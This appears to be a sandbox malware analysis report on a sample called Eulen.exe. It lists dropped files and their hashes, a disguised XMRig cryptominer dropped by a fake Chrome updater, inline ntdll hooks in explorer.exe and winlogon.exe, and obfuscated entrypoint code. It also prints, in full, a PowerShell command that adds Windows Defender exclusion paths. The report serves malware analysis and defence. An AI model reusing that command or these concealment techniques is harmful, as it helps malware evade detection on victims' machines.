SHA-512:	C00665A8527B92BB677696119894947DA47603CD1168B3536E7317E8D82C1A3563D50612C4AEF5BDEE75D491AEC97F8AB543F5FA1EB5E4080E7B1D8A55FE57E6
Malicious:	false
Preview:	ElfChnk.............................................u.=k....................................................................Z}#.................N.......................v...=...........................................................................................................................f...............?...........................m...................M...F...............................'...........................................................................&.......................................**.................sf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	82280
Entropy (8bit):	4.357737910766646
Encrypted:	false
SSDEEP:	384:MIRPRkTaReuZhlR0CsRNHHRoR0kRpayRNRRmRPRkTaRymXR9XPRFrRXVRcrRb8RC:M1uZiDQm3X3NI538LMwuZiDBIX
MD5:	DCFADD8D63F54E90C93512F8DF8D4846
SHA1:	D12A6CB8A6DC07EC55256A66DE15CEAF4D8E7F56
SHA-256:	0489FC8ED49FFE792F12A775955B17B866BFDBD86AC1F7A32BCE1DE257B78DED
SHA-512:	CF2843D5552FCBCACDDE247BFEA43F5A7D4027535681646E98D618D28261EFD0B5755B9EF40170C8B90BB7D78C9A1A1123DB50E8979066A3690ECEE8E256C386
Malicious:	false
Preview:	ElfChnk.J.......S.......J.......S............,......[.l.......................................................................2....................C.......Q............+..=.......................................0"..d...................?..7#.................................................(...f...+...........?....................... .......................M...F.............................................&...........................................................a)...........................................Q.......0.B..1.........'.z&...............................................................<.......T...-.!................@0.B..1..e.p..?.D.e.YY".........Q....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l.................................P.r.o.t.e.c.t.i.o.n.M.a.n.a.g.e.m.e.n.t.......w.m.i.p.r.v.s.e...e.x.e.......".%.P.r.o.g.r.a.m.D.a.t.a.%.\.M.i.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.282820835556058
Encrypted:	false
SSDEEP:	384:chOhpuhdh+h9hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhr:cQsFpkBc1S
MD5:	7DB7567819F7CFC6955126B8306826E6
SHA1:	45CCB1C41CA1C6E1384207444A8B84437408DF1A
SHA-256:	0DDCE2B5ADFAAB4EF8A1686D0064B8CCFF43B1D3C93893A62EF07B7FB896E8E5
SHA-512:	FF5F662885580210B522215F56FD29417B6555F0878610D44D8F798E044876F99F86C5FF688BB77C92B894368E5DF32130B52BFE37401BACD3305B63463A2394
Malicious:	false
Preview:	ElfChnk.........................................P.....Q................................................................................................................:...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&...............!.......................**...............k..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.232783163157918
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVMV3VJmVhpVEVA:Zyjbj
MD5:	71A005B17A2D32C10709277023D447E6
SHA1:	14754F04007D539159F75D62AACC6A282CAA8D54
SHA-256:	6E220C6CCBB76AEE639EDFCC6204C80EEC9FA1CCE0AC40EE4B821AF3AC27887B
SHA-512:	BC3533B3DEF1BC8B7D990700CA573EFF57D05C4E72DF2BB536247466D5FE9EB5DFE6F2EC18F02C808449F998AC00E26E920E3984B4E8367F8E9AF188BD1D9518
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...).....................................................................Ce.~................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v................................................+......................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.214262148200159
Encrypted:	false
SSDEEP:	384:whZBwBjsrBwBhBwBj4BwB6p+/4WBwBQ/cBwBjQNqObx13ABwBqhdBwBQ/LQBwBQ0:wOsc6QNqObxiyS3qes
MD5:	AE26023DBA544E04BF2770D4367BD58A
SHA1:	DB4C811E61D89A0843A9E603D95BC8AC4D4B350E
SHA-256:	DE559CEB6EF4611E677724B38962B5EEB0DF4F3BBB997CF38DA5BF678372286A
SHA-512:	DC1F6FEEDEADF67D8122D68D7DCED925B15FDF48A3912975302C3E21692434E7FB0EC3CEA1585703027DF4CDEEB6AD957F73C8B70581D8FB339C668CAAC0D396
Malicious:	false
Preview:	ElfChnk.^.......m.......^.......m...........@;..p>..9.T7.....................................................................#..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................g...............................................................................&.......................................**.. ...^...........f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.414298413407747
Encrypted:	false
SSDEEP:	384:3thQUE2UEFUE5UEKUEODUEzUEFUEsUE/UEGUE6UEWUE9UEtUEBUE8UEGUEuUE5UD:9w/RPoP6e
MD5:	77D9AFD001F6BBD592C19652D671FEA3
SHA1:	B87EA73299713B00D44A123C4B48636957EA90CE
SHA-256:	E25E174DE18D3B90B5EBC3C394A7C6BFC34F3E27FB260758BC8CB135E4D45770
SHA-512:	C81A545351015315060E812535A43C97A0FCBC2F49AA2034B50F963839F7F7DC1BC16EF070D5FF951E5FE82A9B315E8EFC20470707FD8C995A932E44369845E8
Malicious:	false
Preview:	ElfChnk.........................................8...,..t......................................................................>.......................................R...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................*..............._..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	68128
Entropy (8bit):	4.245775357894047
Encrypted:	false
SSDEEP:	384:rFRMFR7TjoNSg0PtocChoLu60zCwySonMt0SoHMtoLoHMtaoDoH5OD0obO9ZoJfM:Rg7Fj0Dyid9sWryVpxy
MD5:	C0B6774D86D605AB4928604C71921147
SHA1:	989D3EE0B69DF7C26F20D6B6381AC1FD784D7F74
SHA-256:	432A56CE44EA14643B1055296D5F6F229C7100CF68EE56487DED56DCC0B1189D
SHA-512:	CB1554BEC94E4E3B55569AABA1E34F15E59B47106DDB865195E938801BBE1C42031898D6C4E9246404EC0B9503C2584E556559D96DEF7B9BD12CD002C50B2C70
Malicious:	false
Preview:	ElfChnk......................................... ...]..6....................................................................-.^.....................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:...............................................................................................................&...............................*.. ............=6..1...........&.........*.9.LS5..f....A.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81864
Entropy (8bit):	4.457227077605972
Encrypted:	false
SSDEEP:	768:bG4xG4LMo46/iP6f/Qc++PH+YekkG4dRg7V:f9LMFfP6A+PZd6dm
MD5:	913406986D5EFDE1F08F89A853D41557
SHA1:	F220BD99F8D2F34428786082375CE47396D6A350
SHA-256:	AA28373D50642BCFD3045B13EF1C2F7EA510FE4F5FFB5929FD07145B33738591
SHA-512:	378699FA9BF32080F38066AA7EBC929A5503311FFF5B4ECF9AA5711816836DF5D939B2E1494C811C4E4B2DE476A9FE32735C9D056D1AB5FE6CB1B9CED5145718
Malicious:	false
Preview:	ElfChnk.........................................x...E].W....................................................................\..t....................s...h...................=...................................................N...............................................w.......2.......................G...................................Y...........).......M...5...:........................................................................................................... ...........................&.......**...............=6..1.........#m.&........#m...].N.I.P.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	154360
Entropy (8bit):	3.8558072725256203
Encrypted:	false
SSDEEP:	1536:zeLqbrBFCM0PomI7hUh8eLqbrBFCM0PomI7hUhMhxJVf+9f9f+AHF5bx7CQRILqo:zbzhxJVfl
MD5:	E27F56D89F043E072334B26B4913CBEB
SHA1:	690106AD69CDE849069F2DA59385278302DDE0A6
SHA-256:	010648803B9D542D81C348B9DDCDDCE65EF6646FA7849DD05FC7041C000FAB90
SHA-512:	5484FC097F667AA17A684FD573509F4CB4410A230A73B00A9BF7DFEA86D891DB4FD34E3DCD6FFBB2611B6400EA2607C9218098BD1F57741A3CBAFDDAE4C9912B
Malicious:	false
Preview:	ElfChnk.................i.......x...........pl...v...........................................................................3g............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...............&.......................................................................................................**......i........J...1........!j..&.......!j....:Tc`.)..h........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\auqpbnqlvfdv.tmp

Download File

Process:	C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\auqpbnqlvfdv.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.944524618338768
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	Eulen.exe
File size:	44'977'152 bytes
MD5:	f8dd965fe02f49c93f22972470d480b3
SHA1:	859b8399768955c861037b246ca458e847041622
SHA256:	acbae9fb2fe0b90eb94c09bc11726a544ffd22fb5ed20f4477227979e88fdc7d
SHA512:	c1cda92f3f83b50ccf8917920081f89675735eddf2020e1ad3b7429a46268c8893db7b27c80daa673f29ffd4b2523220d3852d1c76883ae1e7e35645b11588f4
SSDEEP:	786432:0k1E58Eufbqc0mWvEjgYsvdT/sG8r+KMbDna+ioiYL:07O7DqJ5EjgYu38yfbDHL
TLSH:	29A7336776D53375E1C34A08D1C762DE62E031BADFAA490D24CBA9023921DD7CE83A77
File Content Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d....A-g...............&.........&...Bp........@.............................P............`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1467042b8
Entrypoint Section:	.D6u
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x672D419F [Thu Nov 7 22:39:27 2024 UTC]
TLS Callbacks:	0x4672eecb, 0x1, 0x40010dc0, 0x1, 0x40010d90, 0x1
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	e0feb4a7ecccf71bc73fce04f6c90c98

Entrypoint Preview

Instruction
inc ecx
push edi
pushfd
dec ecx
mov edi, 4BB88C29h
sub dword ptr [edx+4151FBB0h], edx
neg edi
inc ecx
setl bh
inc ecx
push esp
dec esp
mov edi, dword ptr [esp+18h]
dec eax
mov dword ptr [esp+18h], EB49BDCDh
push dword ptr [esp+10h]
popfd
dec eax
lea esp, dword ptr [esp+18h]
call 00007FAB2508FBB4h
push esi
cmc
inc ecx
xorps xmm3, dqword ptr [ecx+3CF0A63Bh]
popad
inc ecx
div dword ptr [esi+71392461h]
div dword ptr [esi+61012061h]
div dword ptr [esi-4E9D979Fh]
div dword ptr [esi+41711861h]
div dword ptr [esi+27112061h]
shr ch, 1
dec edi
mov esi, C232CB62h
push ecx
popfd
wait
jbe 00007FAB24B8D26Ah
movsb
outsd
xor al, 06h
sbb ebx, edi
movsb
jnc 00007FAB24B8D235h
xor ecx, esi
sbb ebx, edi
movsb
pop edi
outsb
or eax, B662899Eh
dec ebp
mov ebp, 051C0DB5h
push ecx
mov ebp, 41F844CCh
pop ds
scasd
inc edi
pop ebx
inc esi
cmp dh, dl
in al, EFh
adc eax, dword ptr [eax-37h]
test edx, ebp
jc 00007FAB24B8D29Bh
dec esi
xchg dword ptr [711DDB9Ah], esp
push edi
int1
aas
mov cl, 07h
dec edx
mov edx, esi
cli
jl 00007FAB24B8D2D8h
push esp
cmc
mov dword ptr [ecx+ebx*2+19h], ebx
cwde
mov bl, DBh
inc esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4c9cc50	0x64	.D6u
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6ee4000	0x388	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x6edeb70	0x3b4c	.D6u
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6ee3000	0xfc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4424d30	0x28	.D6u
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x43fe000	0x68	.+.:
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b210	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1d000	0x3889540	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x38a7000	0x3e10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x38ab000	0x123c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x38ad000	0xf4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x38ae000	0x25c0	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x38b1000	0xa34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x38b2000	0x60	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x38b3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.@yC	0x38b4000	0x388	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.j]_	0x38b5000	0xb480a6	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.+.:	0x43fe000	0x928	0xa00	4f66c6821e646ac78fb4a2f2035ad352	False	0.028125	data	0.16935542433642847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.D6u	0x43ff000	0x2ae36bc	0x2ae3800	d3f05028aee65b6421bac6ed60e8b436	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x6ee3000	0xfc	0x200	33b8aa63bf4d2fae8774ffab27e42b88	False	0.380859375	data	2.492499062456381	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x6ee4000	0x388	0x400	2c9fe54028274d83c4a5970835085d5a	False	0.453125	data	5.032670505065661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x6ee4058	0x330	XML 1.0 document, ASCII text	English	United States	0.508578431372549

Imports

DLL	Import
KERNEL32.dll	CloseHandle
msvcrt.dll	__C_specific_handler
KERNEL32.dll	GetSystemTimeAsFileTime
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	05:28:21
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\Eulen.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Eulen.exe"
Imagebase:	0x7ff6de660000
File size:	44'977'152 bytes
MD5 hash:	F8DD965FE02F49C93F22972470D480B3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:28:29
Start date:	08/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:28:29
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
